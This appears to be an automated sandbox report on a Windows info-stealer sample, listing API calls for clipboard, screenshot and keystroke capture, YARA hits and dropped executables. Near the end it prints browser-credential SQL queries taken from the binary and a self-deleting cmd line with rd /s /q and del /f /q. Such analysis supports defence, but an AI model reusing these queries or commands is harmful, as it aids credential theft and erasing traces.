Source: C:\Users\user\AppData\Local\Temp\Murano.exe Code function: 13_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 13_2_004050F9
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_00409086 GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock, 16_2_00409086
Contains functionality to record screenshots
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_00414000 Sleep,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetDesktopWindow,GetWindowRect,GetWindowDC,GetDeviceCaps,CreateCompatibleDC,CreateDIBSection,DeleteDC,DeleteDC,DeleteDC,GdiplusShutdown,SaveDC,SelectObject,BitBlt,RestoreDC,DeleteDC,DeleteDC,DeleteDC,GdipAlloc,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,DeleteObject,GdiplusShutdown, 0_2_00414000
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\AppData\Local\Temp\Murano.exe Code function: 13_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 13_2_004044D1
Creates a DirectInput object (often for capturing keystrokes)
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383438295.000000000416A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 00000000.00000003.231267121.0000000005BE0000.00000004.00000001.sdmp, type: MEMORY Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.5b00e50.5.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.5b00e50.5.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 0.3.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.5be0000.0.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer Payload Author: kevoreilly
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Process Stats: CPU usage > 98%
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_03F59AC0 NtdllDefWindowProc_W, 16_2_03F59AC0
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_03F59946 SetLastError,SetWindowLongW,GetLastError,GetWindowLongW,NtdllDefWindowProc_W, 16_2_03F59946
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_05A09946 SetLastError,SetWindowLongW,GetLastError,GetWindowLongW,NtdllDefWindowProc_W, 22_2_05A09946
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_05A09AC0 NtdllDefWindowProc_W, 22_2_05A09AC0
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_059D9946 SetLastError,SetWindowLongW,GetLastError,GetWindowLongW,NtdllDefWindowProc_W, 25_2_059D9946
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_059D9AC0 NtdllDefWindowProc_W, 25_2_059D9AC0
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\AppData\Local\Temp\Murano.exe Code function: 13_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx, 13_2_004038AF
Detected potential crypto function
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0041609C 0_2_0041609C
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_004A12A9 0_2_004A12A9
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_004B94A5 0_2_004B94A5
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_004176A8 0_2_004176A8
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_004A79F2 0_2_004A79F2
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_004A0AA0 0_2_004A0AA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_00409DF0 0_2_00409DF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_004A7E56 0_2_004A7E56
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0044D060 0_2_0044D060
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0049E000 0_2_0049E000
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0040E0E0 0_2_0040E0E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0048D0F0 0_2_0048D0F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_004A80BB 0_2_004A80BB
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_00407150 0_2_00407150
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_00408160 0_2_00408160
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0046C110 0_2_0046C110
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0043A1D0 0_2_0043A1D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_004BC25E 0_2_004BC25E
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0044F230 0_2_0044F230
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_004BE2ED 0_2_004BE2ED
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_004072F0 0_2_004072F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_004BC37E 0_2_004BC37E
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_00460310 0_2_00460310
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_004AE390 0_2_004AE390
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_004AC3BD 0_2_004AC3BD
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_00423440 0_2_00423440
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0048F440 0_2_0048F440
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0042B410 0_2_0042B410
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_00485410 0_2_00485410
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_00446422 0_2_00446422
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0041D4D0 0_2_0041D4D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_00406550 0_2_00406550
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0049C500 0_2_0049C500
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_00487520 0_2_00487520
Source: C:\Users\user\AppData\Local\Temp\Murano.exe Code function: 13_2_0040737E 13_2_0040737E
Source: C:\Users\user\AppData\Local\Temp\Murano.exe Code function: 13_2_00406EFE 13_2_00406EFE
Source: C:\Users\user\AppData\Local\Temp\Murano.exe Code function: 13_2_004079A2 13_2_004079A2
Source: C:\Users\user\AppData\Local\Temp\Murano.exe Code function: 13_2_004049A8 13_2_004049A8
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_004158DD 16_2_004158DD
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_00438A70 16_2_00438A70
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_0043C169 16_2_0043C169
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_0043D29D 16_2_0043D29D
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_0043F3E9 16_2_0043F3E9
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_0043BC3E 16_2_0043BC3E
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_0043CD1D 16_2_0043CD1D
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_0043C6AD 16_2_0043C6AD
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_0043CF98 16_2_0043CF98
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_03F65B2D 16_2_03F65B2D
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_004053A7 18_2_004053A7
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_0040A800 18_2_0040A800
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_0040B0C0 18_2_0040B0C0
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_0040A140 18_2_0040A140
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_0040E970 18_2_0040E970
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_00418250 18_2_00418250
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_0040E208 18_2_0040E208
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_0040AA10 18_2_0040AA10
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_00418A21 18_2_00418A21
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_00418AFB 18_2_00418AFB
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_00409A90 18_2_00409A90
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_00409C50 18_2_00409C50
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_0040BC20 18_2_0040BC20
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_00416DCB 18_2_00416DCB
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_00418D93 18_2_00418D93
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_00413764 18_2_00413764
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_004158DD 22_2_004158DD
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_00438A70 22_2_00438A70
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_0043C169 22_2_0043C169
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_0043D29D 22_2_0043D29D
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_0043F3E9 22_2_0043F3E9
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_0043BC3E 22_2_0043BC3E
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_0043CD1D 22_2_0043CD1D
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_0043C6AD 22_2_0043C6AD
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_0043CF98 22_2_0043CF98
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_05A15B2D 22_2_05A15B2D
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_004158DD 25_2_004158DD
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_00438A70 25_2_00438A70
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_0043C169 25_2_0043C169
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_0043D29D 25_2_0043D29D
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_0043F3E9 25_2_0043F3E9
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_0043BC3E 25_2_0043BC3E
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_0043CD1D 25_2_0043CD1D
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_0043C6AD 25_2_0043C6AD
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_0043CF98 25_2_0043CF98
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_059E5B2D 25_2_059E5B2D
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\lv[1].exe 826D2E8F10F6991F25DAE46522FB53D041A4D740C4AE0A8B570C41C099E9E31F
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\Murano.exe 826D2E8F10F6991F25DAE46522FB53D041A4D740C4AE0A8B570C41C099E9E31F
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\New Feature\4.exe 02F5996141F5FE2B189D8E2B1556EAB985E55E91D9F476DABC691F7C693B2400
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe 1A584D3F6C556EF5B10AEE7D057ADAB2EFFE774D1E85B19FF108899BC84371F3
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: String function: 004033FF appears 45 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: String function: 00401120 appears 130 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: String function: 00421500 appears 65 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: String function: 00421E40 appears 112 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: String function: 00405BC0 appears 100 times
Source: C:\Users\user\AppData\Local\Temp\Murano.exe Code function: String function: 004062CF appears 58 times
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: String function: 059DA650 appears 33 times
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: String function: 0040A400 appears 66 times
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: String function: 05A0A650 appears 33 times
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: String function: 0040F159 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: String function: 0040A400 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: String function: 03F5A650 appears 33 times
PE file contains strange resources
Source: vpn.exe.13.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.395017335.0000000008770000.00000002.00000001.sdmp Binary or memory string: originalfilename vs SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.395017335.0000000008770000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.384789346.0000000006210000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamechartv.dll.muij% vs SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.394558547.0000000008680000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.384521726.00000000060A0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameSHELL32.DLL.MUIj% vs SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383911985.0000000005D10000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemswsock.dll.muij% vs SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
Uses 32bit PE files
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 00000000.00000003.231267121.0000000005BE0000.00000004.00000001.sdmp, type: MEMORY Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.5b00e50.5.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.5b00e50.5.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 0.3.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.5be0000.0.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 4.exe.13.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: SmartClock.exe.16.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@41/35@5/3
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_00408E03 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree, 18_2_00408E03
Source: C:\Users\user\AppData\Local\Temp\Murano.exe Code function: 13_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 13_2_004044D1
Source: C:\Users\user\AppData\Local\Temp\Murano.exe Code function: 13_2_004024FB CoCreateInstance, 13_2_004024FB
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_004017BA FindResourceW,LoadResource,LockResource,SizeofResource, 16_2_004017BA
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File created: C:\Users\user\AppData\Roaming\Satir Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6964:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5568:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2900:120:WilError_01
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Mutant created: \Sessions\1\BaseNamedObjects\{48D87B02-03F7-4188-8BE8-7733FF2CBCA6}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5696:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6988:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6808:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6788:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5188:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:852:120:WilError_01
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File created: C:\Users\user\AppData\Local\Temp\tZVdZWix Jump to behavior
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Binary or memory string: SELECT a11, a102 FROM nssPrivate;
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Binary or memory string: SELECT item1, item2 FROM metadata WHERE id = 'password';
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Binary or memory string: SELECT formSubmitURL, encryptedUsername, encryptedPassword FROM moz_logins;
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Virustotal: Detection: 30%
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe ReversingLabs: Detection: 33%
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe'
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Process created: C:\Users\user\AppData\Local\Temp\Murano.exe 'C:\Users\user\AppData\Local\Temp\Murano.exe'
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c rd /s /q C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk & timeout 3 & del /f /q 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Murano.exe Process created: C:\Users\user\AppData\Local\Temp\New Feature\4.exe C:\Users\user\AppData\Local\Temp\New Feature\4.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 3
Source: C:\Users\user\AppData\Local\Temp\Murano.exe Process created: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
Source: C:\Windows\SysWOW64\makecab.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Process created: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
